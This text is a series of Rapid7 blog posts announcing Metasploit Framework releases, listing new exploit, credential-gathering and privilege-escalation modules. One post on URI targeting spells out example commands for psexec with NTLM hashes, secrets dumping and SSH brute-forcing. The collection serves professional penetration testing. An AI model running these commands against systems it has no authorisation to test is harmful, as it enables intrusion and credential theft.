Tag Archives: Metasploit

Metasploit Wrap-Up

2021-10-01 Erran Carey

Post Syndicated from Erran Carey original https://blog.rapid7.com/2021/10/01/metasploit-wrap-up-132/

Credential gatherers, mix-ins, oh my!

Metasploit Wrap-Up

We’re excited that Metasploit now includes support for 28 related post modules for gathering credentials based on the PackRat toolset. This is a continuation of #5433, #11700, and #11719. It was developed by community contributors Kazuyoshi Maruta, Daniel Hallsworth and Barwar Salim M, for their final year projects at Leeds Beckett University with guidance, code clean-up and some additions by Z. Cliffe Schreuders.

We thank these community contributors for their months of effort and patience while getting so many modules through the code review process.

Netgear PNPX_GetShareFolderList Authentication Bypass

This auxiliary module exploits an authentication bypass in a range of different Netgear router models and firmware versions. The module leverages this vulnerability to log in as the admin user and then achieves a telnet session as root through the auxiliary/scanner/telnet/telnet_login module.

Read more about the SSD Netgear D7000 authentication bypass advisory here.

New module content (30)

Netgear PNPX_GetShareFolderList Authentication Bypass by Grant Willcox and Unknown – The auxiliary/admin/http/netgear_pnpx_getsharefolderlist_auth_bypass module exploits an authentication bypass in various Netgear router models running firmware versions prior to 1.2.0.88, 1.0.1.80, 1.1.0.110, and 1.1.0.84. The module leverages the vulnerability to log in as the admin user and then achieves a telnet session as the root user through the auxiliary/scanner/telnet/telnet_login module.
ECU Hard Reset by Jay Turla – Adds a new ecu_hard_reset hardware module which performs a hard reset in the ECU Reset Service Identifier (0x11)
28 "PackRat" credential gatherers by Barwar Salim M, Daniel Hallsworth, Kazuyoshi Maruta (@KazuCyber), and Z. Cliffe Schreuders (@cliffe) – This pull request adds 28 post-exploitation modules, based on a common mixin, known as PackRat, which gathers file and information artifacts from end users’ systems.
- Aim credential gatherer
- Chrome credential gatherer
- Comodo credential gatherer
- Coolnovo credential gatherer
- Digsby credential gatherer
- Flock credential gatherer
- Gadugadu credential gatherer
- ICQ credential gatherer
- Ie credential gatherer
- Incredimail credential gatherer
- KakaoTalk credential gatherer
- Kmeleon credential gatherer
- LINE credential gatherer
- Maxthon credential gatherer
- Miranda credential gatherer
- Opera credential gatherer
- Operamail credential gatherer
- Postbox credential gatherer
- QQ credential gatherer
- Safari credential gatherer
- Seamonkey credential gatherer
- Srware credential gatherer
- Tango credential gatherer
- Thunderbird credential gatherer
- Tlen credential gatherer
- Viber credential gatherer
- Windows Live Mail credential gatherer
- Xchat credential gatherer

Enhancements and features

#15441 from bf9114 – This change extends the Meterpreter search functionality by adding the ability to search by modified dates across all supported Meterpreter platforms. This allows a user to quickly find files on a target system that has been modified recently, or within a specific date range.
#15594 from h00die – This adds options to the wordpress_scanner that enables the user to only scan for wordpress themes or plugins that Metasploit has modules for.
#15630 from zeroSteiner – This adds the option DB_SKIP_EXISTING to the AuthBrute mixin to give users the option to skip credentials already in the database when performing brute force attacks.
#15669 from adfoster-r7 – Updates the multi/manage/screenshare module to use the Espia screenshot capabilities if present, and to gracefully fallback to using the normal screenshot behavior if it fails to load as expected.
#15721 from zeroSteiner – Support has been added into Metasploit for negotiating SSL connections over multiple connections types including Meterpreter and SSH. As a result, users can now make HTTPS requests over pivoted sessions. Previously, if users tried to make such connections, they would be sent via plaintext instead of being SSL encrypted.
#15722 from adfoster-r7 – The rerun command has been enhanced to support tab completion.
#15726 from zeroSteiner – This adds the MeterpreterTryToFork option to the Mettle payloads. When set, it translates to Mettle’s :background option. When :persist is not configured it will attempt to fork the stage into the background.

Bugs fixed

#15703 from space-r7 – This updates payload/windows/x64/encrypted_shell/reverse_tcp to no longer crash on MacOS. Additionally adds an advanced option, ShowCompileCMD, that prints the compilation command used.
#15720 from NeffIsBack – This fixes a bug where the rhost value was incorrectly passed to the underlying scanning script, resulting in an abnormal exit.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the binary installers (which also include the commercial edition).

Metasploit Wrap-Up

2021-09-24 Adam Galway

Post Syndicated from Adam Galway original https://blog.rapid7.com/2021/09/24/metasploit-wrap-up-131/

Vulnerability is in the eye of the beholder

Metasploit Wrap-Up

Exploiting firmware authored by UDP Technology and provided to multiple large OEMs (including Geutebruck), community contributor TrGFxX has authored a neat module that allows RCE as root on machines running the web interface of the Geutebruck G-Cam and G-Code products. For more information on the vulnerability check out the CISA advisory.

OpManager exploit is OP plz nerf

Our very own zeroSteiner authored a module implementing both an exploit and patch bypass for a Java deserialization vulnerability that exists in numerous versions of ManageEngine’s OpManager software. This module allows payload execution as either NT AUTHORITY\SYSTEM on Windows or root on Linux. On top of this new module, zeroSteiner made improvements to help utilize the increasingly essential YSoSerial tool. You should definitely check it out if you’re interested in exploring other Java deserialization vulns.

Putting the Win in WinRM

In a big win for Metasploit, community contributor smashery finished off their month-long effort to get fully functional shells working across WinRM! These new sessions support post modules, NTLMSSP authentication, and are also able to run without a payload in remote memory, making these sessions pretty hard to detect. This is a major improvement over the previous WinRM implementation that only supported execution of a single command, so huge thanks again to smashery.

You can tell a lot about a protocol from its handshake

In one final noteworthy addition, smashery has once again come through with a PR that significantly improves our RDP library. Metasploit users can now capture the NETBIOS computer name, NETBIOS domain name, DNS computer name, DNS domain name, and OS version from the NTLM handshake carried out over RDP, and our rdp_scanner module has been updated to display this info to all the RDP sniffers out there.

New module content (3)

Direct windows syscall evasion technique by Yaz – This adds a new evasion module that uses direct syscalls on 64-bit versions of Windows to evade detection.
Geutebruck instantrec Remote Command Execution by Ibrahim Ayadhi – RandoriSec and Titouan Lazard – RandoriSec, which exploits CVE-2021-33549 – This module exploits an unauthenticated buffer overflow vulnerability within the action parameter of the /uapi-cgi/instantrec.cgi endpoint in various Geutebruck G-Cam and G-Code devices. The exploit results in code execution as the root user on target devices.
ManageEngine OpManager SumPDU Java Deserialization by Johannes Moritz, Robin Peraglie, and Spencer McIntyre, which exploits CVE-2021-3287 – The exploit/multi/http/opmanager_sumpdu_deserialization module implements an exploit (CVE-2020-28653) and patch bypass (CVE-2021-3287) for a Java deserialization vulnerability that exists in numerous versions of ManageEngine’s OpManager software. Arbitrary code execution as the NT AUTHORITY\SYSTEM user on Windows or the root user on Linux is achieved by sending a PDU to the SmartUpdateManager handler.

Enhancements and features

#15684 from adfoster-r7 – This improves interactive shell performance for pasted user input.
#15696 from smashery – This updates the RDP scanner module to extract and show additional information gathered from the NTLM handshake used for Network Level Authentication (NLA).
#15632 from smashery – This improves Metasploit’s WinRM capabilities by allowing shell sessions to be established over the protocol. The shell sessions are interactive and are usable with post modules.

Bugs fixed

#15600 from agalway-r7 – This fixes an issue with encrypted payloads during session setup. The logic that gathers session info is now located in the bootstrap method, which ensures that this functionality is always carried out before any commands are sent.
#15666 from timwr – This fixes an issue found in Meterpreter’s download functionality where downloading a file with a name containing unicode characters would fail due to incompatible encoding.
#15679 from nvn1729 – This fixes a bug where the tomcat_mgr_upload module was not correctly undeploying the app after exploitation occurred.
#15686 from jmartin-r7 – This fixes a crash in msfrpc that occurs due to the exploit/linux/misc/saltstack_salt_unauth_rce module’s MINIONS option default being a regex instead of a string.
#15695 from adfoster-r7 – This fixes a crash in the exploit/unix/local/setuid_nmap module and adds logging to print the result of the exploit’s last command so the user knows what happened in the event of a failure.
#15697 from smashery – This updates the HTTP NTLM information enumeration module to use the Net::NTLM library for consistent data processing without a custom parser.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

Easier URI Targeting With Metasploit Framework

2021-09-23 Alan David Foster

Post Syndicated from Alan David Foster original https://blog.rapid7.com/2021/09/23/metasploit-uri-support/

Easier URI Targeting With Metasploit Framework

Over the past year and a half, Metasploit Framework’s core engineering team in Belfast has made significant improvements to usability, discoverability, and the general quality of life for the global community of Framework users. A few of the enhancements we’ve worked on in MSF 6 include:

A handy tip command in msfconsole that delivers tips n’ tricks to users
Consolidated EternalBlue modules that removed the need for Python as a dependency, as well as automatic targeting support
AutoCheck support, which runs the check functionality of a module before its exploit capabilities are executed to ensure the module will work beforehand, as well as providing a ForceExploit advanced option that allows a user-override this functionality
A debug command in msfconsole that provides data to help users understand the root cause of issues
Improved cross-platform support for msfdb, as well as supporting external databases — such as using a PostgreSQL Docker container
User experience improvements, including word-wrapping tables, highlighting matched search terms in the search table, and introducing context-aware hints — such as letting users know that they can use the use command to easily select a searched module
Reducing msfconsole’s boot time, as well as reducing the time required to search for modules, and list exploits/payloads in both the console and module.search RPC calls

Today’s blog looks at another series of improvements that have overhauled Framework’s option support to allow for streamlined workflows when specifying multiple module options for protocols like HTTP, MySQL, PostgreSQL, SMB, SSH, and more. This removes the need to individually call set for each module option value before running it — courtesy of pull request #15253.

Overview

Traditional usage of Metasploit involves loading a module and setting multiple options:

use exploit/linux/postgres/postgres_payload

set username administrator

set password pass

set rhost 192.168.123.6

set rport 5432

set database postgres

set lhost 192.168.123.1

set lport 5000

run

You could also specify multiple RHOSTS separated by spaces, or with a CIDR subnet mask:

set rhosts 127.0.0.1 127.0.0.2

set rhosts 127.0.0.1/24

URI support for RHOSTS

As of Metasploit 6.1.4, users can now supply URI strings as arguments to the run command to specify RHOST values and option values at once:

use exploit/linux/postgres/postgres_payload

run postgres://administrator:[email protected] lhost=192.168.123.1 lport=5000

This new workflow will not only make it easier to use reverse-i-search with CTRL+R in Metasploit’s console — it will also make it easier to share cheat sheets among pentesters.

SMB examples

There’s a full page of documentation and examples in the Metasploit Wiki, but here are a few highlights that show the improvements.

Running psexec against a target host:

use exploit/windows/smb/psexec

run smb://user:[email protected] lhost=192.168.123.1 lport=5000

run “smb://user:pass with [email protected]” lhost=192.168.123.1 lport=5000

Running psexec with NTLM hashes:

use exploit/windows/smb/psexec

run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:[email protected] lhost=10.10.14.13 lport=5000

Dumping secrets with NTLM hashes:

use auxiliary/gather/windows_secrets_dump

run smb://Administrator:aad3b435b51404eeaad3b435b51404ee:[email protected]

Downloading a file:

use auxiliary/admin/smb/download_file

run smb://a:[email protected]/my_share/helloworld.txt

Uploading a file:

use auxiliary/admin/smb/upload_file

echo “my file” > local_file.txt

run smb://a:[email protected]/my_share/remote_file.txt lpath=./local_file.txt

SSH examples

If you have valid SSH credentials, the ssh_login module will open a Metasploit session for you:

use scanner/ssh/ssh_login

run ssh://user:[email protected]

Brute-force host with known user and password list:

use scanner/ssh/ssh_login

run ssh://[email protected] threads=50 pass_file=./rockyou.txt

Brute-force credentials:

use scanner/ssh/ssh_login

run ssh://192.168.222.1 threads=50 user_file=./users.txt pass_file=./rockyou.txt

Brute-force credentials in a subnet:

use scanner/ssh/ssh_login

run cidr:/24:ssh://user:[email protected] threads=50

run cidr:/24:ssh://[email protected] threads=50 pass_file=./rockyou.txt

It’s also now possible to port forward through a Metasploit SSH session:

route add 172.18.103.0/24 ssh_session_id

More examples

Full details and examples can be found within the Metasploit Wiki. At the time of release, the following protocols are now supported:

cidr – Can be combined with other protocols to specify address subnet mask
length
file – Load a series of RHOST values separated by newlines from a file (this file can also include URI strings)
http
https
mysql
postgres
smb
ssh

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

Metasploit Wrap-Up

2021-09-17 Brendan Watters

Post Syndicated from Brendan Watters original https://blog.rapid7.com/2021/09/17/metasploit-wrap-up-130/

Clone your way to code execution

Metasploit Wrap-Up

We’ve had a busy week bringing you exploits, features, enhancements, and fixes. Exploit modules for Git and El Finder lead the pack this week with an information disclosure against Jira and a post exploitation module targeting Geutebruck white-labelled cameras to freeze them like every movie ever!

Git push upstream git-lfs:payload

Our own Jack Hysel and Shelby Pace had some fun creating an exploit module targeting Github, originally discovered by Dawid Golunski. The exploit requires a user to clone an infected Github repository to gain remote code execution, and before you ask, we promise it is safe to clone ours.

Jira users

Brian Halbach and Mikhail Klyuchnikov sent us a nice module exploiting CVE-2020-14181 to get a list of Jira users, helping those social engineers among us to get more targets or login scanners more data. Unfortunately, it does not track my tickets and keep them up to date.

New module content (4)

Jira Users Enumeration by Brian Halbach and Mikhail Klyuchnikov, which exploits CVE-2020-14181 – This obtains user names on Jira Server by exploiting an information disclosure vulnerability that exists at the /ViewUserHover.jspa endpoint.
elFinder Archive Command Injection by Shelby Pace and Thomas Chauchefoin, which exploits CVE-2021-32682 – This adds an exploit for CVE-2021-32682 which is an unauthenticated RCE in the elFinder PHP application. The vulnerability is due to a flaw that allows a malicious argument to be passed to the zip command when an archive action is performed.
Git Remote Code Execution via git-lfs (CVE-2020-27955) by Dawid Golunski, jheysel-r7, and space-r7, which exploits CVE-2020-27955 – This adds an exploit for CVE-2020-27955 which is a vulnerability in the Git version control system. The module can be used to execute code in the context of a user that can be convinced to clone a malicious repository.
Geutebruck Camera Deface by Ibrahim Ayadhi and Sébastien Charbonnier – A new post exploitation module has been added which allows one to take a session on a Geutebruck Camera shell and either freeze the current display stream, replace the current display stream with a static image, or restore the display stream such that it will display the current live feed from the camera.

Enhancements and features

#15609 from adfoster-r7 – Adds additional metadata to exploit modules to specify Meterpreter command requirements. This information is used to add a descriptive warning when running modules with a Meterpreter implementation that doesn’t support the required command functionality.
#15674 from digininja – Updates the Apache Tomcat Ghostcat module to correctly handle a larger range of possible success status codes when verifying if the module has succeeded

Bugs fixed

#15667 from bwatters-r7 – Fix powershell_reverse_tcp file operations and update the file operations test module

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Image credit: Toni Barros from São Paulo, Brasil – Hello, Dolly!, CC BY-SA 2.0 https://creativecommons.org/licenses/by-sa/2.0, via Wikimedia Commons

Metasploit Wrap-Up

2021-09-10 Louis Sato

Post Syndicated from Louis Sato original https://blog.rapid7.com/2021/09/10/metasploit-wrap-up-129/

Confluence Server OGNL Injection

Metasploit Wrap-Up

Our own wvu along with Jang added a module that exploits an OGNL injection (CVE-2021-26804)in Atlassian Confluence’s WebWork component to execute commands as the Tomcat user. CVE-2021-26804 is a critical remote code execution vulnerability in Confluence Server and Confluence Data Center and is actively being exploited in the wild. Initial discovery of this exploit was by Benny Jacob (SnowyOwl).

More Enhancements

In addition to the module, we would like to highlight some of the enhancements that have been added for this release. Contributor e2002e added the OUTFILE and DATABASE options to the zoomeye_search module allowing users to save results to a local file or local database along with improving the output of the module to provide better information about the target. Our own dwelch-r7 has added support for fully interactive shells against Linux environments with shell -it. In order to use this functionality, users will have to enable the feature flag with features set fully_interactive_shells true. Contributor pingport80 has added powershell support for write_file method that is binary safe and has also replaced explicit cat calls with file reads from the file library to provide broader support.

New module content (1)

Atlassian Confluence WebWork OGNL Injection by wvu, Benny Jacob, and Jang, which exploits CVE-2021-26084 – This adds an exploit module targeting an OGNL injection vulnerability (CVE-2021-26084) in Atlassian Confluence’s WebWork component to execute commands as the Tomcat user.

Enhancements and features

#15278 from e2002e – The zoomeye_search module has been enhanced to add the OUTFILE and DATABASE options, which allow users to save results to a local file or to the local database respectively. Additionally the output saved has been improved to provide better information about the target and additional error handling has been added to better handle potential edge cases.
#15522 from dwelch-r7 – Adds support for fully interactive shells against Linux environments with shell -it. This functionality is behind a feature flag and can be enabled with features set fully_interactive_shells true
#15560 from pingport80 – This PR add powershell support for write_file method that is binary safe.
#15627 from pingport80 – This PR removes explicit cat calls and replaces them with file reads from the file library so that they have broader support.

Bugs fixed

#15634 from maikthulhu – This PR fixes an issue in exploit/multi/misc/erlang_cookie_rce where a missing bitwise flag caused the exploit to fail in some circumstances.
#15636 from adfoster-r7 – Fixes a regression in datastore serialization that caused some event processing to fail.
#15637 from adfoster-r7 – Fixes a regression issue were Metasploit incorrectly marked ipv6 address as having an ‘invalid protocol’
#15639 from gwillcox-r7 – This fixes a bug in the rename_files method that would occur when run on a non-Windows shell session.
#15640 from adfoster-r7 – Updates modules/auxiliary/gather/office365userenum.py to require python3
#15652 from jmartin-r7 – A missing dependency, py3-pip, was preventing certain external modules such as auxiliary/gather/office365userenum from working due to requests requiring py3-pip to run properly. This has been fixed by updating the Docker container to install the missing py3-pip dependency.
#15654 from space-r7 – A bug has been fixed in lib/msf/core/payload/windows/encrypted_reverse_tcp.rb whereby a call to recv() was not being passed the proper arguments to receive the full payload before returning. This could result in cases where only part of the payload was received before continuing, which would have resulted in a crash. This has been fixed by adding a flag to the recv() function call to ensure it receives the entire payload before returning.
#15655 from adfoster-r7 – This cleans up the MySQL client-side options that are used within the library code.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate
and you can get more details on the changes since the last blog post from
GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest.
To install fresh without using git, you can use the open-source-only Nightly Installers or the
binary installers (which also include the commercial edition).

Metasploit Wrap-Up

2021-09-03 Christophe De La Fuente

Post Syndicated from Christophe De La Fuente original https://blog.rapid7.com/2021/09/03/metasploit-wrap-up-128/

Capture Credentials with our new SMB Server

Metasploit Wrap-Up

Our own Adam Galway revamped the old SMB capture module and now supports NTLMv1 and NTLMv2, as well as SMB1, SMB2 and SMB3. This was possible thanks to @zeroSteiner‘s new RubySMB server implementation. Metasploit is now able to capture NTLM hashes from any recent Windows releases using the SMB2 and SMB3 dialects, even with encrypted SMB traffic.

Revenge of the Clones

Earlier this year, an outstanding vulnerability in Git clients was disclosed and identified as CVE-2021-21300. It allows an attacker to execute scripts on the victim’s system when cloning a specially crafted repository onto a case-insensitive file system such as NTFS, HFS+ or APFS. Our own Shelby Pace just added a new exploit module that leverages this flaw to achieve remote code execution. First, the module creates a fake Git repository and waits for the victim to clone it. This process will deliver a post-checkout script with the payload that will be automatically executed upon checkout of the repository.

Note that for this exploit to work, the victim’s Git client must support delay-capable clean / smudge filters and symbolic links. The former is enabled by default on Windows through Git-lfs.

Don’t clone repositories you don’t trust!

Exploiting eBPF on Linux

A new local exploit module that leverages a bug in the Linux eBPF feature was added by Grant Willcox this week. This vulnerability is identified as CVE-2021-3490 and allows a local attacker to achieve code execution as the root user by conducting an out-of-bounds read and write in the Linux kernel. This is possible due to a flaw in eBPF verifier‘s verification of ALU32 operations. This module is based on @chompie1337‘s PoC code and should work on any vulnerable kernel versions (from 5.7-rc1 prior to 5.13-rc4, 5.12.4, 5.11.21, and
5.10.37). Note that, at the moment, it has only been tested on Ubuntu 20.04 (Focal Fossa) 5.8.x kernels prior to 5.8.0-53.60, Ubuntu 20.10 (Groovy Gorilla) 5.8.x kernels prior to 5.8.0-53.60, Ubuntu 21.04 (Hirsute Hippo) 5.11.x kernels prior to 5.11.0-17.18 and Fedora kernel versions 5.x from 5.7.x up to but not including 5.11.20-300. However, the module documentation includes some instructions for porting the exploit over onto other systems.

New module content (4)

Geutebruck Multiple Remote Command Execution by Ibrahim Ayadhi, Sébastien Charbonnier, and Titouan Lazard, which exploits CVE-2021-33554 – A new module has been added which bypasses authentication and exploits CVE-2021-33544, CVE-2021-33548, and CVE-2021-33550-33554 on Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.27 as well as firmware versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as the root user.
Linux eBPF ALU32 32-bit Invalid Bounds Tracking LPE by Grant Willcox, Manfred Paul, and chompie1337, which exploits ZDI-21-606 – This adds a module that uses @chompie1337’s CVE-2021-3490 PoC code to elevate privileges to root on affected Linux systems. It’s been tested to work on clean installs of Ubuntu 21.04, Ubuntu 20.10, Ubuntu 20.04.02, as well as Fedora running affected versions of the 5.7, 5.8, 5.9, 5.10 and 5.11 kernels.
Git LFS Clone Command Exec by Johannes Schindelin, Matheus Tavares, and Shelby Pace, which exploits CVE-2021-21300 – An exploit module has been added for CVE-2021-21300, a RCE vulnerability in affected Git clients that support delay-capable clean / smudge filters and symbolic links on case-insensitive file systems. Additionally, a set of mixins that aid in exploiting Git clients over the Smart HTTP protocol have been added into Metasploit and the code for older Git-related exploits has been updated to utilize some of this new code.
Overhaul SMB auth capture server from agalway-r7 – This updates the SMB capture server to be compatible with clients using the SMB 2 and SMB 3 dialects. SMB 1 has not been enabled in Windows 10 since v1709 was released in 2017. This allows the module to be compatible with recent releases.

Enhancements and features

#15253 from adfoster-r7 – Updates Metasploit to support URI arguments to set module datastore values. The currently supported protocols are http, smb, mysql, postgres, and ssh.
#15537 from adfoster-r7 – Adds support for Ruby 3
#15582 from bcoles – The code for Msf::Post::Linux::Kernel.unprivileged_bpf_disabled? has been updated to support new values supported by kernel.unprivileged_bpf_disabled which were introduced in Linux kernels since 5.13 and 5.14-rc+HEAD, particularly the value 2 which means Unprivileged calls to bpf() are disabled, whereas the value 1 is now used to indicate Unprivileged calls to bpf() are disabled without recovery
#15606 from adfoster-r7 – Improves Python Meterpreter to gracefully handle unsupported command ids, and cleaning up process objects correctly. Additionally enhances mingw build support for Windows Meterpreter, and now correctly interprets a transport session time of 0 as never expiring.
#15621 from jmartin-r7 – Updates the Metasploit docker container to additionally include Go as a dependency.
#15623 from zeroSteiner – The creds command has been updated to support several new features: supporting formatting NetNTLMv1 and NetNTLMv2 hash for both the JtR and Hashcat formatters, filtering hashes based on the realm, not truncating hashes when writing them to a CSV file, filtering based on the JtR format type name, support for applying the same filtering to output files that can be applied when generating the creds table, and support for ensuring output consistency when writing output to a file.

Bugs fixed

#15375 from HynekPetrak – This PR fixes a bug whereby Metasploit would sometimes crash when remote LDAP servers returned a null character in the base_dn string, and also enhances modules/auxiliary/gather/ldap_hashdump.rb to handle sha256 hashes and skip hashes in cases of LK (locked account) and NP (no password) credentials.
#15572 from adfoster-r7 – This PR implements a fix to correctly handle quoted console options and whitespace
#15573 from dwelch-r7 – The simplify_module function has been updated so that by default it will not load LHOST/RHOST from the config file and instead use the values set in the options.
#15590 from sjanusz-r7 – A bug has been fixed that prevented external modules from properly handling the encoding of UTF-8 characters.
#15596 from tomadimitrie – A bug has been fixed in docker_credential_wincred whereby the regex would sometimes match on IP addresses and other invalid entries instead of the expected Docker version string. This has now been fixed by tightening the regex to make it more specific and restrictive.
#15628 from timwr – Ensures the session table is refreshed whenever the sysinfo command is run, and whenever stdapi is loaded manually. This should also fix a minor bug where if you run an exploit on an existing session, the session information never gets updated (e.g the username from User -> SYSTEM). Now it’s refreshed when you run meterpreter > sysinfo.
#15629 from jmartin-r7 – Fixes a regression issue where msfconsole crashed on startup when running on a Windows environments

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

Metasploit Wrap-Up

2021-08-27 Sonny Gonzalez

Post Syndicated from Sonny Gonzalez original https://blog.rapid7.com/2021/08/27/metasploit-wrap-up-127/

LearnPress authenticated SQL injection

Metasploit Wrap-Up

Metasploit contributor h00die added a new module that exploits CVE-2020-6010, an authenticated SQL injection vulnerability in the WordPress LearnPress plugin. When a user is logged in with contributor privileges or higher, the id parameter can be used to inject arbitrary code through an SQL query. This exploit can be used to collect usernames and password hashes. The responsible code is located in learnpress/inc/admin/lp-admin-functions.php at line 1690. The vulnerability affects plugin versions v3.2.6.7 and prior.

Continuous improvement

In addition to new exploit modules, Metasploit releases include a number of enhancements and bug fixes. This week we would like to highlight a few key enhancements that improve usability. Contributor pingport80 added support for easy reading of binary files from target systems compromised through a PowerShell session. Our very own sjanusz-r7 added a default payload option to the postgres_payload module so that payloads update correctly when changing target systems. An enhancement made by our own gwillcox-r7 extends Windows process lib injection beyond just notepad.exe. The logic now selects from a random list that can be updated in the future. We appreciate all the contributions that make Metasploit more robust and easier to use.

New module content (1)

WordPress LearnPress current_items Authenticated SQLi by Omri Herscovici, Sagi Tzadik, h00die, and nhattruong, which exploits CVE-2020-6010 – This collects usernames and password hashes from WordPress installations via an authenticated SQL injection vulnerability that exists in LearnPress plugin versions below v3.2.6.8.

Enhancements and features

#15384 from gwillcox-r7 – This consolidates and changes the library code used by exploits that use RDLLs. The changes improve upon the logic used to start a process to host the RDLL so it is no longer notepad.exe but randomly selected from a list that can also be updated in the future.
#15477 from pingport80 – This adds PowerShell session support to the readable? and read_file functions provided by the Post::File API.
#15580 from sjanusz-r7 – Updates postgres_payload exploit modules to specify a valid default PAYLOAD option when changing target architectures
#15584 from h00die – Updates the list of WordPress plugins and themes to allow users to discover more plugins and themes when running tools such as auxiliary/scanner/http/wordpress_scanner

Bugs fixed

#15496 from zeroSteiner – Users can now specify the SSL version for servers with the SSLVersion datastore option, ensuring compatibility with a range of targets old and new.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

Metasploit Wrap-Up

2021-08-20 Jeffrey Martin

Post Syndicated from Jeffrey Martin original https://blog.rapid7.com/2021/08/20/metasploit-wrap-up-126/

Anyone enjoy making chains?

Metasploit Wrap-Up

The community is hard at work building chains to pull sessions out of vulnerable Exchange servers. This week Rapid7’s own wvu & Spencer McIntyre added a module that implements the ProxyShell exploit chain originally demonstrated by Orange Tsai. The module also benefited from research and analysis by Jang, PeterJson, brandonshi123, and mekhalleh (RAMELLA Sébastien) to make it as simple as finding an email for an administrator of vulnerable version of exchange as the entrypoint to chain CVE-2021-31207, CVE-2021-34523, & CVE-2021-34473 into sessions for everyone to enjoy.

Great to see some GSoC value in the wild.

With Google Summer of Code 2021 moving into its final phases, pingport80 had 4 PRs land in this week’s release. These improvements and fixes to interactions with sessions make post exploitation tasks more accessible, bringing the community more capabilities and stability along the way.

New module content (2)

Lucee Administrator imgProcess.cfm Arbitrary File Write by wvu,, iamnoooob, and rootxharsh, which exploits CVE-2021-21307 – An unauthenticated user is permitted to make requests through the imgProcess.cfm endpoint, and using the file parameter which contains a directory traversal vulnerability, they can write a file to an arbitrary location. Combining the two capabilities, this module writes a CFML script to the vulnerable server and achieves unauthenticated code execution as the user running the Lucee server.
Microsoft Exchange ProxyShell RCE by wvu, Jang, Orange Tsai, PeterJson, Spencer McIntyre, brandonshi123, and mekhalleh (RAMELLA Sébastien), which exploits CVE-2021-31207 – Added an exploit for the ProxyShell attack chain against Microsoft Exchange Server.

Enhancements and features

#15540 from dwelch-r7 – This adds an option to cmd_execute to have the command run in a subshell by Meterpreter.
#15556 from pingport80 – This adds shell session compatibility to the post/windows/gather/enum_unattend module.
#15564 from pingport80 – This adds support to the get_env and command_exists? post API methods for Powershell session types.

Bugs fixed

#15303 from pingport80 – This PR ensures that the shell dir command returns a list.
#15332 from pingport80 – This improves localization support and compatibly in the session post API related to the rename_file method.
#15539 from tomadimitrie – This improves the OS version in the check method of exploit/windows/local/cve_2018_8453_win32k_priv_esc.
#15546 from timwr – This ensures that the UUID URLs of stageless reverse_http(s) payloads are stored in the database so that they can be properly tracked with payload UUID tracking. This also fixes an error caused by accessing contents of a url list without checking if it’s valid first.
#15570 from adfoster-r7 – This fixes a bug in the auxiliary/scanner/smb/smb_enum_gpp module where the path that was being generated by the module caused an SMB exception to be raised.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

Metasploit Wrap-Up

2021-08-13 Erin Bleiweiss

Post Syndicated from Erin Bleiweiss original https://blog.rapid7.com/2021/08/13/metasploit-wrap-up-125/

Print Driver PrivEsc

Metasploit Wrap-Up

If you attended DEF CON last week, you may have seen this talk on print driver vulnerabilities from Metasploit community contributor Jacob Baines. In the spirit of Friday the 13th, we’re highlighting some of these "print nightmares" again, in the form of two new Metasploit modules that Jacob added.
The first is a Canon TR150 Print Driver Local Privilege Escalation module, which exploits CVE-2021-38085. The second is a Lexmark Universal Print Driver Local Privilege Escalation module, which exploits CVE-2021-35449. Both modules target Windows systems with their respective vulnerable print drivers installed, and result in privilege escalation to a SYSTEM user.

Atlassian Crowd RCE

Also new in this week’s release is an Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE module by Rapid7’s own Grant Willcox, which exploits CVE-2019-11580. This vulnerability allows an attacker to upload arbitrary plugins to vulnerable Atlassian Crowd data servers and achieve unauthenticated remote code execution. This module also includes a check method for verifying whether a target is vulnerable to this exploit. It should be noted that this vulnerability made the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) list of the 12 most routinely exploited vulns for 2020).

New module content (3)

Atlassian Crowd pdkinstall Unauthenticated Plugin Upload RCE by Corben Leo, Grant Willcox, and Paul, which exploits CVE-2019-11580 – This adds an exploit for CVE-2019-11580 which is an unauthenticated RCE within the Atlassian Crowd application. The vulnerability allows for a malicious JAR file to be loaded, resulting in arbitrary Java code execution within the context of the service.
Canon Driver Privilege Escalation by Jacob Baines and Shelby Pace, which exploits CVE-2021-38085 – A new module has been added to exploit CVE-2021-38085, a privilege escalation issue in the Canon TR150 Print Driver. Successful exploitation results in code execution as the SYSTEM user.
Lexmark Driver Privilege Escalation by Grant Willcox, Jacob Baines, and Shelby Pace, which exploits CVE-2021-35449 – A new module has been added to exploit CVE-2021-35449, a privilege escalation issue in a variety of Lexmark drivers including the Universal Print Driver. Successful exploitation allows local attackers to gain SYSTEM level code execution.

Enhancements and features

#15327 from adfoster-r7 – Fixes a regression issue in the RPC analyze command. Adds automated integration tests to ensure it doesn’t break in the future.
#15430 from zeroSteiner – This adds support for SSH pivoting by adding a new Command Shell session type for SSH clients. This also updates both auxiliary/scanner/ssh/ssh_login and auxiliary/scanner/ssh/ssh_login_pubkey modules to include these changes. Note that it only supports TCP client connections and only outbound payloads can be used through the SSH pivot at the moment (no reverse payloads).
#15493 from jmartin-r7 – Updated Metasploit’s dependency on Rails from version 5.2 to 6.1
#15523 from adfoster-r7 – This enhances the console output with additional information on why a session may not be compatible with a post module, such as missing Meterpreter commands.
